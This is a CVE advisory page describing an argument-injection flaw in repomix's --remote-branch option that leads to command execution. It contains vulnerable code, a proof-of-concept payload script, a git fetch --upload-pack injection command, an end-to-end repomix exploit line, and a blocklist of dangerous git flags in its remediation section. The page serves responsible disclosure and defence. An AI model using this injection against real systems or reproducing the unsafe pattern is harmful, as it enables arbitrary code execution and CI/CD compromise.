CVE-2026-49987

HIGHPre-NVD 8.88.8
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
8.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 8.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

repomix Vulnerable to Command Injection (RCE) via --remote-branch Argument Injection

Vulnerability Metadata

| Field | Detail | | --- | --- | | Affected Component | src/core/git/gitCommand.ts (execGitShallowClone) | | Impact | Arbitrary Command Execution / Security Control Bypass |

Summary

The --remote-branch CLI option in repomix is vulnerable to argument injection. User-supplied input is passed directly to git fetch and git checkout subprocesses via child_process.execFileAsync without sanitization, -- delimiters, or validation.

An attacker can inject arbitrary git command-line options. By injecting the --upload-pack option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing dangerousParams blocklist implemented in validateGitUrl().

Vulnerable Code Analysis

File: src/core/git/gitCommand.ts

The remoteBranch parameter is appended directly to the arguments array for git subprocesses without the -- positional delimiter.

Sink 1 (Lines 118-127):

await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], // Vulnerable
  gitRemoteOpts,
);

Sink 2 (Lines 148-151):

await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]); // Vulnerable

Bypassed Security Control (Lines 192-197): The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the validateGitUrl function. However, this validation is exclusively applied to the url variable and omitted for remoteBranch, creating a direct bypass.

Attack Flow

[Source] repomix --remote-branch 
   ↓
src/cli/actions/remoteAction.ts:226 (cloneRepository)
   ↓
src/core/git/gitCommand.ts:118 (execGitShallowClone)
   ↓
[Sink] execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])
   ↓
[Execution] git invokes the payload binary via transport helper

Proof of Concept (Steps to Reproduce)

1. Create the Payload Create an executable bash script that writes system execution context to a file. *(Reference: Screenshot_2026-05-18_13_02_16.png)*

cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack

2. Trigger the Vulnerability Establish a dummy remote and trigger the fetch operation, injecting the --upload-pack argument. *(Reference: Screenshot_2026-05-18_13_08_36.png)*

# Setup dummy bare remote
git init --bare /tmp/dummy-remote.git

Initialize local repo and add remote

mkdir /tmp/test-fetch && cd /tmp/test-fetch git init git remote add origin file:///tmp/dummy-remote.git

Execute vulnerability

git fetch --upload-pack=/tmp/malicious-pack origin 2>&1

3. Verify Execution Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.

cat /tmp/repomix-pwned.txt

*Expected Output:*

=== RCE EXECUTED ===
uid=1000(kakashi) gid=1000(kakashi) groups=1000(kakashi)...

End-to-End Execution via Repomix:

repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'

Impact

* Remote Code Execution: Complete system compromise with the privileges of the user executing repomix. * CI/CD Compromise: If repomix is utilized in automated pipelines where --remote-branch is populated by external triggers (e.g., webhook payloads, PR titles), attackers can compromise build servers and exfiltrate secrets.

Remediation

1. Implement Positional Delimiters (Primary Fix) Append the -- delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing remoteBranch.

await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
  gitRemoteOpts,
);

2. Apply Existing Blocklist to Branch Parameter (Defense in Depth) Update execGitShallowClone to validate remoteBranch against the existing dangerousParams array.

const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];

if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) { throw new RepomixError(Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}); }

Attachments

Screenshot 1: Payload script created with executable permissions.

Screenshot 2: Vulnerable Code

Screenshot 3: Verifying RCE.


Credits

This vulnerability was discovered and responsibly disclosed by:

CVSS v3
8.8
EG Score
8.8(low)
EPSS
KEV
Not listed

Published

July 1, 2026

Last Modified

July 1, 2026

Vendor Advisories for CVE-2026-49987(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 11× in last 7d / 11× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-06 19:50 UTCEG score recompute
  2. 2026-07-06 07:47 UTCEG score recompute
  3. 2026-07-05 19:37 UTCEG score recompute
  4. 2026-07-05 07:34 UTCEG score recompute
  5. 2026-07-04 19:30 UTCEG score recompute
  6. 2026-07-04 07:26 UTCEG score recompute
  7. 2026-07-03 19:16 UTCEG score recompute
  8. 2026-07-03 07:13 UTCEG score recompute
  9. 2026-07-02 19:10 UTCEG score recompute
  10. 2026-07-02 07:06 UTCEG score recompute
  11. 2026-07-01 19:02 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-49987?
CVE-2026-49987 is a high vulnerability published on July 1, 2026. repomix Vulnerable to Command Injection (RCE) via --remote-branch Argument Injection Vulnerability Metadata | Field | Detail | | --- | --- | | Affected Component | src/core/git/gitCommand.ts (execGitShallowClone) | | Impact | Arbitrary Command Execution / Security Control Bypass | Summary The…
When was CVE-2026-49987 disclosed?
CVE-2026-49987 was first published in the National Vulnerability Database on July 1, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-49987?
CVE-2026-49987 has a CVSS v4.0 base score of 8.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-49987?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-49987, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-49987

Explore →

Is Your Infrastructure Affected by CVE-2026-49987?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.